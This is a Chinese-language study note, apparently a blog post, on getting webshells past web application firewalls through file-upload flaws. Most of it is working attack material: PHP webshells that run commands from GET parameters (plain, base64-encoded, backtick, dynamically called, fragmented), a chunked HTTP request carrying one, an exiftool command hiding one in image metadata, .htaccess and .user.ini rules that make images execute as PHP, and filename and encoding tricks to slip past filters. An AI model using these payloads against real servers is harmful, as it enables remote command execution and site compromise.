文件上传漏洞绕过WAF

文件上传漏洞绕过WAF学习笔记


1. WAF检测原理

WAF(Web应用防火墙)通过以下方式拦截文件上传攻击:

  1. 关键字匹配 :检测文件名、内容中的敏感词(如<?phpeval)。

  2. 扩展名黑名单 :拦截.php.jsp等危险扩展名。

  3. 文件头验证 :检查文件魔数(如FFD8FF对应JPEG)。

  4. 流量特征分析:检测异常请求结构(如超长文件名、畸形HTTP包)。


2. 通用绕过技术

2.1 解析差异利用

  • 大小写混合sHell.PhP.Php(部分WAF未统一大小写)。

  • 特殊字符插入

    • 分号截断(IIS):shell.asp;.jpg → 解析为.asp

    • 换行符插入:filename="shell.p\nhp"(绕过正则匹配)。

  • 扩展名混淆

    • 多重扩展名:shell.php.jpg → 结合解析漏洞(如Apache解析最后有效扩展名)。

    • 非标准扩展名:.php7.phtml.phar(需环境支持)。


2.2 编码混淆

  • URL编码

    • shell.%70hp%70=p)→ 部分WAF不解码检测。
  • Unicode编码

    • shell.\u0070hp → 转换为shell.php
  • HTML实体编码

    • 文件名:shell.#112;hp#112;=p)。
  • Base64/Hex编码文件内容

    php

    复制代码
    <?= eval(base64_decode("c3lzdGVtKCRfR0VUWydjbWQnXSk7")); ?>  

2.3 分块传输(Chunked Encoding)

  • 绕过原理:WAF可能不解析分块传输的文件内容。

  • 示例

    http

    复制代码
    POST /upload HTTP/1.1  
    Transfer-Encoding: chunked  
    ​
    7\r\n  
    <?php \r\n  
    8\r\n  
    system($_GET['cmd']);\r\n  
    0\r\n  
  • 工具 :Burp Suite的Chunked Coding Converter插件。


2.4 文件内容绕过

  • 图片马注入

    • 在图片元数据中插入代码(Exif注释、IPTC字段)。

    bash

    复制代码
    exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg  
  • 短标签与动态调用

    php

    复制代码
    <?= `$_GET[0]`?>  # 短标签  
    <?php $_GET['a']($_GET['b']); ?>  # 动态函数调用  
  • 代码碎片化

    php

    复制代码
    <?php $a = "syste"; $b = "m"; $a.$b("id"); ?>  

2.5 HTTP协议特性利用

  • 参数污染

    http

    复制代码
    POST /upload?filename=shell.jpg HTTP/1.1  
    Content-Disposition: form-data; name="file"; filename="shell.php"  
    • 部分WAF优先取URL参数中的文件名。
  • 多文件上传绕过

    • 在多个文件字段中插入恶意文件,WAF可能只检测第一个。

3. 针对特定WAF的绕过

3.1 云WAF(如Cloudflare、阿里云)

  • 缓存污染攻击

    • 上传合法文件触发缓存,再覆盖为恶意文件。
  • IP轮询绕过

    • 通过大量不同IP上传,绕过频率限制。

3.2 ModSecurity规则绕过

  • 已知规则缺陷

    • 使用非常规扩展名:.php%20(空格)、.php.(末尾点)。

    • 利用正则回溯限制:构造超长文件名耗尽WAF计算资源。


4. 高级技巧

4.1 .htaccess/.user.ini覆盖

  • .htaccess(Apache)

    复制

    复制代码
    AddType application/x-httpd-php .jpg  
  • .user.ini(PHP)

    复制

    复制代码
    auto_prepend_file=shell.jpg  

4.2 分片上传绕过

  • 上传文件分片后合并,绕过WAF对完整文件的检测。

4.3 0day漏洞利用

  • CVE-2023-XXXX:特定WAF未修复的解析漏洞(需持续跟踪)。
相关推荐
上海云盾商务经理杨杨3 小时前
AI如何重塑DDoS防护行业?六大变革与未来展望
人工智能·安全·web安全·ddos
视觉&物联智能16 小时前
【杂谈】-人工智能驱动的网络安全威胁:新一代网络钓鱼
网络·人工智能·web安全·网络安全·安全威胁分析
博睿谷IT99_16 小时前
网络安全怎么入门?快速了解
安全·web安全
落——枫19 小时前
网络安全知识点3
安全·web安全
安全系统学习20 小时前
网络安全之红队LLM的大模型自动化越狱
运维·人工智能·安全·web安全·机器学习·php
浩浩测试一下1 天前
网络安全实战指南:从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)
linux·安全·web安全·ubuntu·网络安全·负载均衡·安全架构
mooyuan天天1 天前
Webug3.0通关笔记17 中级进阶(第01-05关)
web安全·文件包含·sql注入·webug靶场
vortex51 天前
网络安全入门综述
安全·web安全·网络安全
神经毒素2 天前
WEB安全--社会工程--SET钓鱼网站
安全·web安全
琢磨先生David2 天前
重构数字信任基石:Java 24 网络安全特性的全维度革新与未来防御体系构建
java·web安全·密码学